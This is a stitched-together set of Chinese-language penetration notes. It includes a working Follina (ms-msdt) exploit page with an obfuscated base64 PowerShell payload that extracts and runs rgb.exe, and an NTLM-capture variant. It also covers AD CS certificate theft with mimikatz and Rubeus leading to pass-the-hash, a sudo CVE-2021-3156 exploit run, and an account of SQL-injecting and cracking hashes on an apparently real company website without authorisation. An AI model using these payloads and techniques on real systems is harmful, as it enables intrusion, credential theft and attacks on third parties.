//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA //AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA //AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA //AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA //AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA //AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA //AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA //AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA //AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA //AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA //AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA //AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA //AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA //AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA //AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA //AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA //AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA //AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA //AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA //AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA window.location.href = "ms-msdt:/id PCWDiagnostic /skip force /param \"IT_RebrowseForFile=cal?c IT_LaunchMethod=ContextMenu IT_SelectProgram=NotListed IT_BrowseForFile=h$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'UTF8.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'JGNtZCA9ICJjOlx3aW5kb3dzXHN5c3RlbTMyXGNtZC5leGUiO1N0YXJ0LVByb2Nlc3MgJGNtZCAtd2luZG93c3R5bGUgaGlkZGVuIC1Bcmd1bWVudExpc3QgIi9jIHRhc2traWxsIC9mIC9pbSBtc2R0LmV4ZSI7U3RhcnQtUHJvY2VzcyAkY21kIC13aW5kb3dzdHlsZSBoaWRkZW4gLUFyZ3VtZW50TGlzdCAiL2MgY2QgQzpcdXNlcnNccHVibGljXCYmZm9yIC9yICV0ZW1wJSAlaSBpbiAoMDUtMjAyMi0wNDM4LnJhcikgZG8gY29weSAlaSAxLnJhciAveSYmZmluZHN0ciBUVk5EUmdBQUFBIDEucmFyPjEudCYmY2VydHV0aWwgLWRlY29kZSAxLnQgMS5jICYmZXhwYW5kIDEuYyAtRjoqIC4mJnJnYi5leGUiOw=='+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe IT_AutoTroubleshoot=ts_AUTO\""; </script> </body> </html> //////////////////// powershell IEX运行 $(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'UTF8.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'JGNtZCA9ICJjOlx3aW5kb3dzXHN5c3RlbTMyXGNtZC5leGUiO1N0YXJ0LVByb2Nlc3MgJGNtZCAtd2luZG93c3R5bGUgaGlkZGVuIC1Bcmd1bWVudExpc3QgIi9jIHRhc2traWxsIC9mIC9pbSBtc2R0LmV4ZSI7U3RhcnQtUHJvY2VzcyAkY21kIC13aW5kb3dzdHlsZSBoaWRkZW4gLUFyZ3VtZW50TGlzdCAiL2MgY2QgQzpcdXNlcnNccHVibGljXCYmZm9yIC9yICV0ZW1wJSAlaSBpbiAoMDUtMjAyMi0wNDM4LnJhcikgZG8gY29weSAlaSAxLnJhciAveSYmZmluZHN0ciBUVk5EUmdBQUFBIDEucmFyPjEudCYmY2VydHV0aWwgLWRlY29kZSAxLnQgMS5jICYmZXhwYW5kIDEuYyAtRjoqIC4mJnJnYi5leGUiOw=='+[char]34+'))')))) /////////////////// base64解码内容: $cmd = "c:\windows\system32\cmd.exe"; Start-Process $cmd -windowstyle hidden -ArgumentList "/c taskkill /f /im msdt.exe"; # 隐藏窗口杀死msdt.exe Start-Process $cmd -windowstyle hidden -ArgumentList "/c cd C:\users\public\&&for /r %temp% %i in (05-2022-0438.rar) do copy %i 1.rar /y&&findstr TVNDRgAAAA 1.rar>1.t&&certutil -decode 1.t 1.c &&expand 1.c -F:* .&&rgb.exe"; # 进入public目录,循环遍历 RAR 文件中的文件,查找编码 CAB 文件的 Base64 字符串 将此 Base64 编码的 CAB 文件存储为1.t 解码Base64编码的CAB文件保存为1.c 将1.c CAB文件展开到当前目录,最后: 执行rgb.exe(大概压缩在1.c CAB文件里面) 运行了rgb.exe后会释放几个文件,最后调用csc编译 (cs太长了就不贴出来了) msdt微软官方参数解释如下: param参数貌似微软没公开怎么调用,只给了架构图 漏洞复现 参考链接: https://huntress.com/blog/microsoft-office-remote-code-execution-follina-msdt-bug https://benjamin-altpeter.de/shell-openexternal-dangers/ https://github.com/JohnHammond/msdt-follina tips:html注释内容不能少于4096字节 将原payload修改为以下可以远程请求获取NTLM ms-msdt:-id PCWDiagnostic /moreoptions false /skip true /param IT_BrowseForFile="\\\\192.168.92.129\\sharp\\calc.exe" /param IT_SelectProgram="NotListed" /param IT_AutoTroubleshoot="ts_AUTO" 1 执行命令和上线 踩坑:powershell语句太长base64编码执行不成功报错如下
-
理论知识 在传统的kerberos认证的时候,是使用用户密码进行认证的。回顾下申请TGT的过程。 用用户hash加密时间戳作为value,type为PA-ENC-TIMESTAMP, 放在PA_DATA上。KDC收到请求,使用用户hash解密value的值得到时间戳跟当前时间做比对,如果在合理的范围(正常五分钟),就认证通过。 事实上也可以使用证书作为认证,这也是这次spectorops关于ADCS研究的最大亮点,后面漏洞紧紧围绕这点。 RFC4556引入了对 Kerberos 预身份验证的公钥加密支持。这个RFC 的title是Public Key Cryptography for Initial Authentication in Kerberos,后面我们使用简称PKINIT来介绍使用证书进行kerberos身份认证这种方法。 PKINIT同样也使用时间戳,但不是使用用户密码派生密钥加密消息,而是使用属于证书的私钥对消息进行签名。 测试环境 DC windows server 2019 AD CS Windows Server 2008 非域内机器windows 7 测试准备 certtmlp.msc - 证书模板控制台 certsrv.msc - 证书颁发机构 certmgr.msc - 证书管理 给一域用户安装个用户证书 win+r运行certmgr.msc,选择个人,右键,所有任务->申请新证书。请求证书选择用户(即可生成当前用户的一个证书) 安装后如下 执行certutil -user -store My可以看到用户证书 场景模拟 假设一台域内机器带有一个用户证书要怎么利用他? 先把这个证书dump下来(需要包括私钥)可以用certutil或者直接用certmgr.msc dump certutil -user -exportPFX <SHA1 hash> test1.pfx 1 (dump的时候需要给证书设置个密码(如果该证书默认没密码的话)) (使用certutil导出) 这里有一种情况不能通过这两种方式dump,有些证书在导入的时候需要密码或者不勾选标志此密钥为可导出的密钥,需要mimikatz dump dump出现如下问题 使用mimikatz的crypto::capi修改lsass,然后在dump (这个报错也不影响,具体原因不知) (这证书dump下来如果导入的时候设置了密码也没用,验证根本过不了,也不知道有啥用) crypto::capi #修改lsass crypto::certificates /systemstore:local_machine /store:my /export 1 2 (没以administrator权限执行) (以administrator权限执行) 尝试用Rubeus进行申请票据 知道证书密码或者dump证书的时候没设置不可dump可自己设置密码 Rubeus.exe asktgt /user:csadmin /password:123456 /certificate:admin.pfx /domain:joker.local /dc:WIN-0ASLVBO5ID9.joker.local #123456是私钥密码(dump证书的时候设置的) 1 利用过程 理论点 在域内利用 Rubeus.exe申请票据导入到当前进程,然后获取hash用wmiexec.py连接之类的 (清空原有的票据进行测试) Rubeus进行申请票据 获取hash 不在域内利用 将pfx移动到win7,并导入证书。在hosts文件添加域控IP和加入被控制机器的IP和机器名或者DNS改为域控的IP (代理进内网) 利用keke获取ntlm,然后用wmiexec.py连接之类的 tgt::pac /subject:csadmin /castore:current_user /domain:joker.local 1 直接利用mimikatz令牌注入用psexec连接AD CS服务器 (pth ntlm到新进程psexec连接) 常见搜索证书的位置 我们经常可以在邮件,磁盘里面看到证书,我们一般按照后缀来搜索证书的,我们一般关注以下后缀 1、key后缀的,只包含私钥 2、crt/cer 后缀的,只包含公钥 3、csr后缀的,证书申请文件,不包含公钥,也不包含私钥。没啥用 4、pfx,pem,p12后缀的,包含公私钥,我们最喜欢的。 搜索文件后缀的每个人使用的工具不一样,我个人比较喜欢的是SharpSearch,.Net的项目,支持内存加载,可以写成CNA插件。
-
影响版本 Sudo 1.8.2 – 1.8.31p2 Sudo 1.9.0 – 1.9.5p1 sudo官方位于1月26号已经修复,后面在安装的sudo已经补上了 官方链接:https://www.sudo.ws/ 不影响的版本 sudo =>1.9.5p2 exp:https://github.com/422926799/note/tree/master/%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8/CVE-2021-3156 来源于某微信公众号:https://mp.weixin.qq.com/s/c9UiJ74TbLXziK08tumIHA 环境 Debain Sudo version 1.8.31p1 Ubuntu Sudo version 1.8.21p2 (昨天安的sudo已经修复) 复现过程 检测是否存在漏洞 sudoedit -s / 存在 不存在 下载exp,make。然后运行sudo-hax-me-a-sandwich
-
在zoomeye瞎逛,找到个站,顺手搞搞,到后面还是没能拿下shell,kindeditor编辑器真草…. eu99t1.png 信息收集 zoomeye搜到的就是一个IP eu9R41.png whois就不查了,毛用没有又不是搞服务商…..除了自我安慰,哎 旁站查询走一波:同IP网站查询,C段查询,IP反查域名,C段旁注,旁注工具 eu9f9x.png 我他妈…. eu9h36.jpg 用ip138查查同IP 域名查iP 域名解析 iP查询网站 iP反查域名 iP反查网站 同一iP网站 同iP网站域名iP查询 euCV2V.png 域名全部ping了一遍…发现一个域名不是同一个IP,超级ping了一下,发现在山西有个节点 euC5in.png 端口扫描了一波,发现有节点的那个域名出现在443端口,估计是多个域名解析到同一个DNS euCzJ1.png 7kb扫描工具一顿扫,没扫出来 euATDf.png 。。。 eu9h36.jpg 打开这个站一看,后台光明正大的写在主页 euEV2R.md.png 。。。 eu9h36.jpg 整理了一下收集到的信息 euZkcR.png 随便点了一下链接发现有类似&id=的url,测试了一下注入,发现SQL注入 euEgs0.png 当时就想着扔sqlmap里面跑,然后sqlmap报错。。后面想了一下这个的https证书是有问题的,还有就是sqlmap跑类似于以下的url会发神经 http://test.com/test.php?user=demo&id=1 1 euEzJH.png https证书有问题 euViOP.png 百思不得其解的时候,搜到了篇文章 sqlmap在https情况下的一个错误 | MSAREHERE 文章的作者使用在本地写了个php,然后使用curl配置屏蔽掉https错误,然后在通过curl发送数据给目标站点 <?php $url = "http://xxx.com"; $sql = $_GET[s]; $s = urlencode($sql); $url = $url.$sql; echo $url; // $params = "email=$s&password=aa"; //echo $params; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE); // https请求 不验证证书和hosts curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (compatible; MSIE 5.01; Windows NT 5.0)'); curl_setopt($ch, CURLOPT_TIMEOUT, 15); // curl_setopt($ch, CURLOPT_POST, 1); // post 提交方式 // curl_setopt($ch, CURLOPT_POSTFIELDS, $params); $output = curl_exec($ch); curl_close($ch); echo $output; $a = strlen($output); echo $a; ?> 本地访问了一下还真的ok euVJkF.png 然后直接扔sqlmap跑就ok sqlmap -u http://127.0.0.1/demos.php?s=%20* 1 euValR.png 然后发现不是dba权限 euVfXt.png dump出后台的hash发现还有两个跑不出 eu9h36.jpg 还好最后一个hash跑出来了 euVI78.png 得到用户名密码 euZVnx.png 后台一登陆,看见编辑器kindeditor euZsuq.png google搜了一遍,发现只能重命名或者备份getshell eu9h36.jpg [渗透实战]某铸造设备公司官网经典思路 - DYBOY - 专注程序开发与信息安全 原本打算子域名看看能不能搞的,查出来的都是什么
